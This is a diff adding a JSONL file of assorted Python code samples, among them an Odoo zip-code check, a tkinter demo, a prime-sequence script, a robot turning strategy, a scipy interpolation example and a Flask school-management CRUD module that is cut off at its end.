diff --git "a/4756.jsonl" "b/4756.jsonl" new file mode 100644--- /dev/null +++ "b/4756.jsonl" @@ -0,0 +1,687 @@ +{"seq_id":"300630594","text":"from openerp.osv import fields, osv\n\nclass sale(osv.Model):\n _name = 'sale.order'\n _inherit = ['sale.order']\n\n def check_order(self, cr, uid, ids, context=None):\n #def action_button_confirm(self, cr, uid, ids, context=None):\n \"\"\"\n Validates the zip code of the partner before confirming this order.\n :param cr: the db cursor\n :param uid: the user id\n :param ids: the ids of the sales order\n :param context: the openerp context\n :return: the same as the super method returns if validation succeeds. If not an exception is thrown and a\n message is displayed to the user.\n \"\"\"\n saleOrder = self.browse(cr, uid, ids[0], context=context)\n if saleOrder and saleOrder.partner_shipping_id:\n if context:\n context.update({'wf_sale': True})\n else:\n context = {'wf_sale': True}\n check = self.pool.get('res.partner').validate_zip(cr, uid, [saleOrder.partner_shipping_id.id], context=context)\n if not check:\n self.write(cr,uid, saleOrder.id,{'wf_confirm_failure': '6'})\n\n #return super(sale, self).action_button_confirm(cr, uid, ids, context=context)\n return super(sale, self).check_order(cr, uid, ids, context=None)\n\n","sub_path":"hf_zipcode_validation_AWN_HF_4/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"367750056","text":"from tkinter import *\r\n\r\ndef drawCirc():\r\n sel = LB.curselection()\r\n print(sel)\r\n can.delete(\"all\")\r\n k=sel[0]\r\n radius=[10,25,50]\r\n off=radius[k]\r\n center=100\r\n can.create_oval(center-off, center-off, center+off, center+off, outline=\"red\", fill=\"blue\", width=2)\r\n\r\n\r\ndef onSelect(event):\r\n drawCirc()\r\n \r\ndef press():\r\n can.delete(\"all\")\r\n \r\n #center.bell()\r\n\r\n\r\ndef set_up():\r\n global left,right,top,center,can,LB,TB\r\n\r\n root.geometry(\"800x600\")\r\n root.configure(bg=\"yellow\")\r\n #root.resizable(width=FALSE, height=FALSE)\r\n \r\n top = Frame(root,width=800,height=60,bg=\"red\")\r\n #top.pack(side = TOP, fill=BOTH)\r\n top.pack(side = TOP)\r\n \r\n right = Frame(root,width=100,height=500,bg=\"blue\")\r\n right.pack(side = RIGHT, fill=BOTH)\r\n\r\n left = Frame(root,width=100,height=500,bg=\"green\")\r\n left.pack(side = LEFT, fill=BOTH)\r\n\r\n center = Frame(root,width=600,height=540,bg=\"yellow\")\r\n center.pack(side = TOP, fill=BOTH)\r\n\r\n can=Canvas(center,width=200,height=200,bg=\"pink\")\r\n can.pack(side=TOP)\r\n\r\n but = Button(left,text=\"clear\",width=10,command=press)\r\n but.pack(side=TOP,fill=X)\r\n\r\n LB = Listbox(right)\r\n LB.configure({\"height\":5,\"font\":(\"Verdana\",18),\"bg\":\"white\",\"fg\":\"red\",\"width\":7})\r\n LB.pack()\r\n\r\n command=[\"small\",\"medium\",\"large\"]\r\n for cmd in command:\r\n LB.insert(END, cmd)\r\n LB.select_set(0)\r\n LB.bind(\"<>\", onSelect)\r\n drawCirc()\r\n\r\nroot = Tk()\r\nset_up()\r\nmainloop()\r\n","sub_path":"C15_apr11/frame5.py","file_name":"frame5.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"72668788","text":"def isPrime(num):\n if num > 1:\n for i in range(2, int(num/2)+1):\n\n if (num % i) == 0:\n return False\n break\n else:\n return True\n\n else:\n return False\n\ndef findLong(a, n):\n\n ans = []\n m = 0\n t = 0\n for i in range(n):\n \n if i != n - 1 and a[i] < a[i + 1]:\n t += 1\n else:\n if m < t:\n m = t\n t = 0\n ans = a[i - m:i + 1]\n\n ans = [str(i) for i in ans]\n ans = ' '.join(ans)\n return ans\n\n\n\nt = int(input())\nl = list(map(int, input().split()))\np = []\n\nfor item in l:\n if isPrime(item):\n p.append(item)\n\nprint(findLong(p, len(p)))\n","sub_path":"Contests/Women Technologists Codesprint/GCTC_Coding_Contest/h.py","file_name":"h.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"602629947","text":"from .stratTourne import StratTourne\n\nclass StratTourneplus(StratTourne):\n \"\"\"\n Cette Stratégie permet de ralentir progressivement le robot vers l'angle self.angle\n Afin de s'approcher le plus précisement possible de l'angle voulu sans le dépasser\n \"\"\"\n def __init__(self, robot, angle, vitesse):\n StratTourne.__init__(self,robot,angle,vitesse)\n self.ralenti = 0\n \n def step(self):\n angleg = (self.robot.get_motor_position()[0]*self.robot.WHEEL_CIRCUMFERENCE) /(self.robot.WHEEL_BASE_CIRCUMFERENCE)\n angled = (self.robot.get_motor_position()[1]*self.robot.WHEEL_CIRCUMFERENCE) /(self.robot.WHEEL_BASE_CIRCUMFERENCE)\n \n super().step()\n \n # On divise la vitesse de rotation des 2 roues si l'angle de rotation du robot\n # est au 4/5 de l'angle voulu\n if(self.ralenti == 0 and (angleg >= self.angle*(4/5) or angled <= -self.angle*(4/5))):\n self.robot.set_motor_dps(1, (self.vit/2))\n self.robot.set_motor_dps(2, -(self.vit/2))\n self.vit = (self.vit/2)\n self.ralenti = 1\n \n # On divise la vitesse de rotation des 2 roues si l'angle de rotation du robot\n # est au 5/6 de l'angle voulu\n if(self.ralenti == 1 and (angleg >= self.angle*(5/6) or angled <= -self.angle*(5/6))):\n self.robot.set_motor_dps(1, (self.vit/2))\n self.robot.set_motor_dps(2, -(self.vit/2))\n self.vit = (self.vit/2)\n self.ralenti = 2\n \n","sub_path":"strategie/stratTourneplus.py","file_name":"stratTourneplus.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"110634763","text":"from scipy.interpolate import interp1d \nimport numpy as np\nimport matplotlib.pyplot as plot\n\nx = np.linspace(0,10, num=11, endpoint = True)\ny = np.cos(-x**2/9.0)\n#linear interpolation\nf = interp1d(x,y)\n#cubic spline interpolation\nf2 = interp1d (x,y,kind = 'cubic')\nxnew = np.linspace(0,10,num=41,endpoint = True)\nplot.plot(x,y,'o',xnew,f(xnew),'-',xnew,f2(xnew),'--')\n\nplot.legend(['data','linear','cubic'],loc = 'best')\nplot.show() \n","sub_path":"scipy_examples/interpolate_2d.py","file_name":"interpolate_2d.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"329920010","text":"from app import app, db\nfrom flask import render_template, redirect, url_for, flash, request\nfrom app.forms import SchoolFormCreate, SchoolFormUpdate, \\\n PromoFormCreate, PromoFormUpdate, BranchFormCreate, BranchFormUpdate, \\\n AnnualFormCreate, AnnualFormUpdate, \\\n SemesterFormCreate, SemesterFormUpdate, SemesterFormSpecialUpdate, \\\n WilayaFormCreate, WilayaFormUpdate, TeacherFormCreate, TeacherFormUpdate\nfrom app.models import School, Branch, Annual, Semester, Module, Unit, Wilaya, Promo, Teacher\nfrom flask_breadcrumbs import register_breadcrumb\n# import babel\nfrom datetime import datetime\nfrom sqlalchemy import or_\n\n# from app.prencipal import *\n\n\n\n#######################################\n##### INDEX #####\n\n@app.route('/basic-tables/')\n@register_breadcrumb(app, '.basic', 'Basic Tables')\ndef basic_index():\n return render_template('basic-forms/index.html', title='Basic Tables List')\n\n\n#######################################\n##### Promo #####\n\n@app.route('/promo/')\n@register_breadcrumb(app, '.basic.promo', 'Promos')\ndef promo_index():\n # i have to order by school & branch\n promos = Promo.query.order_by(Promo.branch_id, Promo.start_date).all()\n return render_template('basic-forms/promo/index.html', title='Promos List', promos=promos)\n\n@app.route('/promo/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.promo.create', 'Create')\ndef promo_create():\n form = PromoFormCreate()\n \n if form.validate_on_submit():\n promo = Promo(\n name=form.name.data, \n display_name=form.display_name.data, \n branch_id=form.branch_id.data, \n # start_date=form.start_date.data, \n start_date=convert_dtstr_to_dt('start_date_str', extention='-01'), \n # finish_date=form.finish_date.data, \n finish_date=convert_dtstr_to_dt('finish_date_str', extention='-28'), \n color=form.color.data\n )\n db.session.add(promo)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('promo_view', id=promo.id))\n return render_template('basic-forms/promo/create.html', title='Promo Create', form=form)\n\n\n\ndef convert_dtstr_to_dt(dt_name, in_format='%Y-%m-%d', out_format='%Y-%m-%d', extention='-01'):\n dt = None\n if request.method == 'POST':\n dt_request = request.form.get(dt_name)\n if dt_request != None and dt_request != '':\n # \n # case : in_format\n dt_string = str(dt_request)+extention\n # \n # \n # \n # \n dt = datetime.strptime(dt_string, out_format)\n return dt\n\n\n\n@app.route('/promo/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.promo.view.update', 'Update')\ndef promo_update(id):\n promo = Promo.query.get_or_404(id)\n form = PromoFormUpdate(promo.id)\n \n if form.validate_on_submit():\n promo.name = form.name.data\n promo.display_name = form.display_name.data\n # promo.branch_id = form.branch_id.data\n # promo.start_date = form.start_date.data\n promo.start_date = convert_dtstr_to_dt('start_date_str', extention='-01')\n # promo.finish_date = form.finish_date.data\n promo.finish_date = convert_dtstr_to_dt('finish_date_str', extention='-28')\n\n promo.color = form.color.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('promo_view', id=promo.id))\n elif request.method == 'GET':\n form.name.data = promo.name\n form.display_name.data = promo.display_name\n form.start_date.data = promo.start_date\n # if promo.start_date != None and promo.start_date != '':\n # form.start_date.data = promo.start_date.strftime(\"%d/%m/%Y\")\n form.finish_date.data = promo.finish_date\n form.branch_id.data = promo.branch_id\n form.color.data = promo.color\n return render_template('basic-forms/promo/update.html', title='Promo Update', form=form)\n\n@app.route('/promo//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.promo.view', 'View')\ndef promo_view(id):\n promo = Promo.query.get_or_404(id)\n return render_template('basic-forms/promo/view.html', title='Promo View', promo=promo)\n\n@app.route('/promo/delete//', methods=['GET', 'POST'])\ndef promo_delete(id):\n promo = Promo.query.get_or_404(id)\n # Note:\n # has sessions or annual sessions\n if len(promo.sessions) > 0:\n flash(\"you can't delete this Promo because it is in Relation with other Records\", 'alert-danger')\n flash(\"you have to break the relation with the Sessions first\")\n return redirect(url_for('promo_view', id=id))\n\n db.session.delete(promo)\n db.session.commit()\n flash('Promo: ' + str(promo.name) + ' is deleted', 'alert-success')\n return redirect(url_for('promo_index'))\n\n\n#######################################\n##### School #####\n\n@app.route('/school/')\n@register_breadcrumb(app, '.basic.school', 'Schools')\ndef school_index():\n schools = School.query.all()\n return render_template('basic-forms/school/index.html', title='Schools List', schools=schools)\n\n@app.route('/school/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.school.create', 'Create')\ndef school_create():\n form = SchoolFormCreate()\n if form.validate_on_submit():\n school = School(\n name=form.name.data, \n description=form.description.data\n )\n db.session.add(school)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('school_view', id=school.id))\n return render_template('basic-forms/school/create.html', title='School Create', form=form)\n\n@app.route('/school/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.school.view.update', 'Update')\ndef school_update(id):\n school = School.query.get_or_404(id)\n form = SchoolFormUpdate(school.id)\n if form.validate_on_submit():\n school.name = form.name.data\n school.description = form.description.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('school_view', id=school.id))\n elif request.method == 'GET':\n form.name.data = school.name\n form.description.data = school.description\n return render_template('basic-forms/school/update.html', title='School Update', form=form)\n\n@app.route('/school//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.school.view', 'View')\ndef school_view(id):\n school = School.query.get_or_404(id)\n return render_template('basic-forms/school/view.html', title='School View', school=school)\n\n@app.route('/school/delete//', methods=['GET', 'POST'])\ndef school_delete(id):\n school = School.query.get_or_404(id)\n if len(school.branches) > 0:\n flash(\"you can't delete this School because it is in Relation with other Records\", 'alert-danger')\n flash(\"you have to break the relation with the Branches first\")\n return redirect(url_for('school_view', id=id))\n db.session.delete(school)\n db.session.commit()\n flash('School: ' + str(school.name) + ' is deleted', 'alert-success')\n return redirect(url_for('school_index'))\n\n\n#######################################\n##### Branch #####\n\n@app.route('/branch/')\n@register_breadcrumb(app, '.basic.branch', 'Branches')\ndef branch_index():\n # i have to order by school & branch\n branches = Branch.query.order_by(Branch.school_id).all()\n return render_template('basic-forms/branch/index.html', title='Branches List', branches=branches)\n\n@app.route('/branch/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.branch.create', 'Create')\ndef branch_create():\n form = BranchFormCreate()\n if form.validate_on_submit():\n branch = Branch(\n name=form.name.data, \n description=form.description.data, \n school_id=form.school_id.data\n )\n db.session.add(branch)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('branch_view', id=branch.id))\n return render_template('basic-forms/branch/create.html', title='Branch Create', form=form)\n\n@app.route('/branch/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.branch.view.update', 'Update')\ndef branch_update(id):\n branch = Branch.query.get_or_404(id)\n form = BranchFormUpdate(branch.id)\n if form.validate_on_submit():\n branch.name = form.name.data\n branch.description = form.description.data\n branch.school_id = form.school_id.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('branch_view', id=branch.id))\n elif request.method == 'GET':\n form.name.data = branch.name\n form.description.data = branch.description\n form.school_id.data = branch.school_id\n return render_template('basic-forms/branch/update.html', title='Branch Update', form=form)\n\n@app.route('/branch//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.branch.view', 'View')\ndef branch_view(id):\n branch = Branch.query.get_or_404(id)\n return render_template('basic-forms/branch/view.html', title='Branch View', branch=branch)\n\n@app.route('/branch/delete//', methods=['GET', 'POST'])\ndef branch_delete(id):\n branch = Branch.query.get_or_404(id)\n if len(branch.promos) > 0 or len(branch.annuals) > 0 or len(branch.students) > 0:\n flash(\"you can't delete this Branch because it is in Relation with other Records\", 'alert-danger')\n if len(branch.promos) > 0:\n flash(\"you have to break the relation with the Sessions first\")\n if len(branch.annuals) > 0:\n flash(\"you have to break the relation with the Annuals first\")\n return redirect(url_for('branch_view', id=id))\n db.session.delete(branch)\n db.session.commit()\n flash('Branch: ' + str(branch.name) + ' is deleted', 'alert-success')\n return redirect(url_for('branch_index'))\n\n\n#######################################\n##### Annual #####\n\n@app.route('/annual/')\n@register_breadcrumb(app, '.basic.annual', 'Annuales')\ndef annual_index():\n # i have to order by school & annual\n annuals = Annual.query.join(Branch).order_by(Branch.id, Annual.annual).all()\n return render_template('basic-forms/annual/index.html', title='Annuals List', annuals=annuals)\n\n@app.route('/annual/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.annual.create', 'Create')\ndef annual_create():\n form = AnnualFormCreate()\n if form.validate_on_submit():\n annual = Annual(\n name=form.name.data, \n display_name=form.display_name.data, \n annual=form.annual.data,\n branch_id=form.branch_id.data\n )\n db.session.add(annual)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('annual_view', id=annual.id))\n return render_template('basic-forms/annual/create.html', title='Annual Create', form=form)\n\n@app.route('/annual/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.annual.view.update', 'Update')\ndef annual_update(id):\n annual = Annual.query.get_or_404(id)\n form = AnnualFormUpdate(annual.id)\n if form.validate_on_submit():\n annual.name = form.name.data\n annual.display_name = form.display_name.data\n annual.annual = form.annual.data\n annual.branch_id = form.branch_id.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('annual_view', id=annual.id))\n elif request.method == 'GET':\n form.name.data = annual.name\n form.display_name.data = annual.display_name\n form.annual.data = annual.annual\n form.branch_id.data = annual.branch_id\n return render_template('basic-forms/annual/update.html', title='Annual Update', form=form)\n\n@app.route('/annual//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.annual.view', 'View')\ndef annual_view(id):\n annual = Annual.query.get_or_404(id)\n return render_template('basic-forms/annual/view.html', title='Annual View', annual=annual)\n\n@app.route('/annual/delete//', methods=['GET', 'POST'])\ndef annual_delete(id):\n annual = Annual.query.get_or_404(id)\n if len(annual.promos) > 0 or len(annual.semesters) > 0:\n flash(\"you can't delete this Annual because it is in Relation with other Records\", 'alert-danger')\n if len(annual.promos) > 0:\n flash(\"you have to break the relation with the Promoss first\")\n if len(annual.semesters) > 0:\n flash(\"you have to break the relation with the Semesters first\")\n return redirect(url_for('annual_view', id=id))\n db.session.delete(annual)\n db.session.commit()\n flash('Annual: ' + str(annual.name) + ' is deleted', 'alert-success')\n return redirect(url_for('annual_index'))\n\n\n#######################################\n##### Semester #####\n\n@app.route('/semester/')\n@register_breadcrumb(app, '.basic.semester', 'Semesteres')\ndef semester_index():\n # i have to order by school & semester\n semesters = Semester.query.join(Annual)\\\n .order_by(Annual.id, Semester.semester, Semester.latest_update).all()\n return render_template('basic-forms/semester/index.html', title='Semesters List', semesters=semesters)\n\n@app.route('/semester/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.semester.create', 'Create')\ndef semester_create():\n form = SemesterFormCreate()\n if form.validate_on_submit():\n semester = Semester(\n name=form.name.data, \n display_name=form.display_name.data, \n semester=form.semester.data,\n # is_closed=form.is_closed.data,\n annual_id=form.annual_id.data\n # latest_update\n )\n db.session.add(semester)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('semester_view', id=semester.id))\n return render_template('basic-forms/semester/create.html', title='Semester Create', form=form)\n\n@app.route('/semester/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.semester.view.update', 'Update')\ndef semester_update(id):\n semester = Semester.query.get_or_404(id)\n if semester.is_locked():\n flash(\"You can't update a closed Semester\")\n return redirect(url_for('semester_view', id=id))\n form = SemesterFormUpdate(id)\n if form.validate_on_submit():\n semester.name = form.name.data\n semester.display_name = form.display_name.data\n semester.semester = form.semester.data\n # semester.is_closed = form.is_closed.data\n semester.annual_id = form.annual_id.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('semester_view', id=id))\n elif request.method == 'GET':\n form.name.data = semester.name\n form.display_name.data = semester.display_name\n form.semester.data = semester.semester\n # form.is_closed.data = semester.is_closed\n form.annual_id.data = semester.annual_id\n return render_template('basic-forms/semester/update.html', title='Semester Update', form=form)\n\n@app.route('/semester/duplication-update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.semester.view.update', 'Update Name')\ndef semester_special_update(id):\n semester = Semester.query.get_or_404(id)\n form = SemesterFormSpecialUpdate(id)\n if form.validate_on_submit():\n semester.name = form.name.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('semester_view', id=id))\n elif request.method == 'GET':\n form.name.data = semester.name\n return render_template('basic-forms/semester/update.html', title='Semester Duplication Update', form=form)\n\ndef semester_view_dlc(*args, **kwargs):\n id = request.view_args['id']\n semester = Semester.query.get_or_404(id)\n return [{'text': 'S '+str(semester.get_nbr()), 'url': url_for('semester_view', id=id)}]\n\n@app.route('/semester//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.semester.view', '', dynamic_list_constructor=semester_view_dlc)\ndef semester_view(id):\n semester = Semester.query.get_or_404(id)\n return render_template('basic-forms/semester/view.html', title='Semester View', semester=semester)\n\n# WARNING: i have to check before i delete\n@app.route('/semester/delete//', methods=['GET', 'POST'])\ndef semester_delete(id):\n semester = Semester.query.get_or_404(id)\n if len(semester.sessions) > 0:\n flash(\"you can't delete this Semester because it is in Relation with other Records\", 'alert-danger')\n flash(\"you have to break the relation with the Sessions first\")\n return redirect(url_for('semester_view', id=id))\n db.session.delete(semester)\n db.session.commit()\n flash('Semester: ' + str(semester.name) + ' is deleted', 'alert-success')\n return redirect(url_for('semester_index'))\n\n@app.route('/semester/close//', methods=['GET', 'POST'])\ndef semester_close(id):\n semester = Semester.query.get_or_404(id)\n for parallel in semester.get_parallels():\n if parallel.is_locked() == True:\n parallel.is_closed = True\n semester.is_closed = True\n db.session.commit()\n flash(\"this Semester is now Closed\", 'alert-success')\n return redirect(url_for('semester_view', id=id))\n\n@app.route('/semester/open//', methods=['GET', 'POST'])\ndef semester_open(id):\n semester = Semester.query.get_or_404(id)\n for parallel in semester.get_parallels():\n if parallel.is_locked() != True:\n flash(\"you can have only one Open Semester at a time\", \"alert-danger\")\n return redirect(url_for('semester_index'))\n semester.is_closed = False\n db.session.commit()\n flash(\"this Semester is now Open\", 'alert-success')\n return redirect(url_for('semester_view', id=id))\n\n# you can find Semester Duplication \n# in routesConfig.py duplicate_config()\n\n\n#######################################\n##### Unit #####\n\n@app.route('/unit/delete//', methods=['GET', 'POST'])\ndef unit_delete(id):\n unit = Module.query.get_or_404(id)\n if len(unit.grades) > 0 or len(unit.unit_sessions) > 0 or len(unit.percentages) > 0:\n flash(\"you can't delete this Module because it is in Relation with other Records\", 'alert-danger')\n if len(unit.grades) > 0:\n flash(\"you have to break the relation with the Grades first\")\n if len(unit.unit_sessions) > 0:\n flash(\"you have to break the relation with the ModuleSessions first\")\n if len(unit.unit_sessions) > 0:\n flash(\"you have to break the relation with the ModuleSessions first\")\n return redirect(url_for('unit_view', id=id))\n db.session.delete(unit)\n db.session.commit()\n flash('Module: ' + str(unit.name) + ' is deleted', 'alert-success')\n return redirect(url_for('unit_index'))\n\n\n#######################################\n##### Percantage #####\n\n\n#######################################\n##### Module #####\n\n@app.route('/module/')\n@register_breadcrumb(app, '.basic.module', 'Modules')\ndef module_index():\n modules = Module.query.join(Unit)\\\n .join(Semester)\\\n .join(Annual).join(Branch).join(School)\\\n .order_by(School.name, Branch.name, Annual.annual, Semester.semester, Unit.name, Module.code)\\\n .all()\n\n open_modules = []\n for module in modules:\n semester = module.unit.semester\n if semester.is_locked() == True and len(semester.get_parallels()) > 1:\n continue\n open_modules.append(module)\n\n return render_template('basic-forms/module/index.html', title='Modules List', modules=open_modules)\n\n\n# @app.route('/module/create/', methods=['GET', 'POST'])\n# @register_breadcrumb(app, '.basic.module.create', 'Create')\n# def module_create():\n# form = ModuleFormCreate()\n# if form.validate_on_submit():\n# module = Module(\n# code=form.code.data, \n# name=form.name.data, \n# display_name=form.display_name.data, \n# coefficient=form.coefficient.data, \n# credit=form.credit.data, \n# time=form.credit.data, \n# order=form.credit.data, \n# unit_id=form.unit_id.data\n# )\n# db.session.add(module)\n# db.session.commit()\n# flash('Created and Saved Successfully.', 'alert-success')\n# return redirect(url_for('module_view', id=module.id))\n# return render_template('basic-forms/module/create.html', title='Module Create', form=form)\n\n# @app.route('/module/update//', methods=['GET', 'POST'])\n# @register_breadcrumb(app, '.basic.module.view.update', 'Update')\n# def module_update(id):\n# module = Module.query.get_or_404(id)\n# form = ModuleFormUpdate(module.id)\n# if form.validate_on_submit():\n# module.code = form.code.data\n# module.name = form.name.data\n# module.display_name = form.display_name.data\n# # module.coefficient = form.coefficient.data\n# # module.credit = form.credit.data\n# # module.time = form.time.data\n# # module.order = form.order.data\n# # module.unit_id = form.unit_id.data\n# db.session.commit()\n# flash('Your changes have been saved.', 'alert-success')\n# return redirect(url_for('module_view', id=module.id))\n# elif request.method == 'GET':\n# form.code.data = module.code\n# form.name.data = module.name\n# form.display_name.data = module.display_name\n# # form.coefficient.data = module.coefficient\n# # form.credit.data = module.credit\n# # form.time.data = module.time\n# # form.order.data = module.order\n# # form.unit_id.data = module.unit_id\n# return render_template('basic-forms/module/update.html', title='Module Update', form=form)\n\n@app.route('/module//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.module.view', 'View')\ndef module_view(id):\n module = Module.query.get_or_404(id)\n return render_template('basic-forms/module/view.html', title='Module View', module=module)\n\n# @app.route('/module/delete//', methods=['GET', 'POST'])\n# def module_delete(id):\n# module = Module.query.get_or_404(id)\n# if len(module.grades) > 0 or len(module.module_sessions) > 0 or len(module.percentages) > 0:\n# flash(\"you can't delete this Module because it is in Relation with other Records\", 'alert-danger')\n# if len(module.grades) > 0:\n# flash(\"you have to break the relation with the Grades first\")\n# if len(module.module_sessions) > 0:\n# flash(\"you have to break the relation with the ModuleSessions first\")\n# if len(module.module_sessions) > 0:\n# flash(\"you have to break the relation with the ModuleSessions first\")\n# return redirect(url_for('module_view', id=id))\n# db.session.delete(module)\n# db.session.commit()\n# flash('Module: ' + str(module.name) + ' is deleted', 'alert-success')\n# return redirect(url_for('module_index'))\n\n\n#######################################\n##### Wilaya #####\n\n@app.route('/wilaya/')\n@register_breadcrumb(app, '.basic.wilaya', 'Wilayas')\ndef wilaya_index():\n wilayas = Wilaya.query.all()\n return render_template('basic-forms/wilaya/index.html', title='Wilayas List', wilayas=wilayas)\n\n@app.route('/wilaya/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.wilaya.create', 'Create')\ndef wilaya_create():\n form = WilayaFormCreate()\n if form.validate_on_submit():\n wilaya = Wilaya(\n code=form.code.data, \n name=form.name.data, \n )\n db.session.add(wilaya)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('wilaya_view', id=wilaya.id))\n return render_template('basic-forms/wilaya/create.html', title='Wilaya Create', form=form)\n\n@app.route('/wilaya/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.wilaya.view.update', 'Update')\ndef wilaya_update(id):\n wilaya = Wilaya.query.get_or_404(id)\n form = WilayaFormUpdate(wilaya.id)\n if form.validate_on_submit():\n wilaya.code = form.code.data\n wilaya.name = form.name.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('wilaya_view', id=wilaya.id))\n elif request.method == 'GET':\n form.code.data = wilaya.code\n form.name.data = wilaya.name\n return render_template('basic-forms/wilaya/update.html', title='Wilaya Update', form=form)\n\n@app.route('/wilaya//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.wilaya.view', 'View')\ndef wilaya_view(id):\n wilaya = Wilaya.query.get_or_404(id)\n return render_template('basic-forms/wilaya/view.html', title='Wilaya View', wilaya=wilaya)\n\n# WARNING: i have to check before i delete\n@app.route('/wilaya/delete//', methods=['GET', 'POST'])\ndef wilaya_delete(id):\n wilaya = Wilaya.query.get_or_404(id)\n if len(wilaya.students) > 0 or len(wilaya.teachers) > 0:\n flash(\"you can't delete this Wilaya because it is in Relation with other Records\", 'alert-danger')\n if len(wilaya.students) > 0:\n flash(\"you have to break the relation with the Students first\")\n if len(wilaya.teachers) > 0:\n flash(\"you have to break the relation with the Teachers first\")\n return redirect(url_for('wilaya_view', id=id))\n db.session.delete(wilaya)\n db.session.commit()\n flash('Wilaya: ' + str(wilaya.name) + ' is deleted', 'alert-success')\n return redirect(url_for('wilaya_index'))\n\n\n#######################################\n##### Teacher #####\n\n@app.route('/teacher/')\n@register_breadcrumb(app, '.basic.teacher', 'Teachers')\ndef teacher_index():\n teachers = Teacher.query.all()\n return render_template('basic-forms/teacher/index.html', title='Teachers List', teachers=teachers)\n\n@app.route('/teacher/create/', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.teacher.create', 'Create')\ndef teacher_create():\n form = TeacherFormCreate()\n if form.validate_on_submit():\n teacher = Teacher(\n username=form.username.data,\n title=form.title.data, \n last_name=form.last_name.data, \n first_name=form.first_name.data,\n # last_name_arab=form.last_name_arab.data,\n # first_name_arab=form.first_name_arab.data,\n email=form.email.data,\n birth_date=form.birth_date.data,\n birth_place=form.birth_place.data,\n address=form.address.data,\n wilaya_id=form.wilaya_id.data,\n sex=form.sex.data,\n phone=form.phone.data,\n ccp=form.ccp.data\n )\n db.session.add(teacher)\n db.session.commit()\n flash('Created and Saved Successfully.', 'alert-success')\n return redirect(url_for('teacher_view', id=teacher.id))\n return render_template('basic-forms/teacher/create.html', title='Teacher Create', form=form)\n\n@app.route('/teacher/update//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.teacher.view.update', 'Update')\ndef teacher_update(id):\n teacher = Teacher.query.get_or_404(id)\n form = TeacherFormUpdate(teacher.id)\n if form.validate_on_submit():\n teacher.username = form.username.data\n teacher.title = form.title.data\n teacher.last_name = form.last_name.data\n teacher.first_name = form.first_name.data\n # teacher.last_name_arab = form.last_name_arab.data\n # teacher.first_name_arab = form.first_name_arab.data\n if len(form.email.data) > 0:\n teacher.email = form.email.data\n teacher.birth_date = form.birth_date.data\n teacher.birth_place = form.birth_place.data\n teacher.address = form.address.data\n teacher.wilaya_id = form.wilaya_id.data\n teacher.sex = form.sex.data\n teacher.phone = form.phone.data\n teacher.ccp = form.ccp.data\n db.session.commit()\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('teacher_view', id=teacher.id))\n elif request.method == 'GET':\n form.username.data = teacher.username\n form.title.data = teacher.title\n form.last_name.data = teacher.last_name\n form.first_name.data = teacher.first_name\n # form.last_name_arab.data = teacher.last_name_arab\n # form.first_name_arab.data = teacher.first_name_arab\n form.email.data = teacher.email\n form.birth_date.data = teacher.birth_date\n form.birth_place.data = teacher.birth_place\n form.address.data = teacher.address\n form.wilaya_id.data = teacher.wilaya_id\n form.sex.data = teacher.sex\n form.phone.data = teacher.phone\n form.ccp.data = teacher.ccp\n return render_template('basic-forms/teacher/update.html', title='Teacher Update', form=form)\n\n@app.route('/teacher//', methods=['GET', 'POST'])\n@register_breadcrumb(app, '.basic.teacher.view', 'View')\ndef teacher_view(id):\n teacher = Teacher.query.get_or_404(id)\n return render_template('basic-forms/teacher/view.html', title='Teacher View', teacher=teacher)\n\n# WARNING: i have to check before i 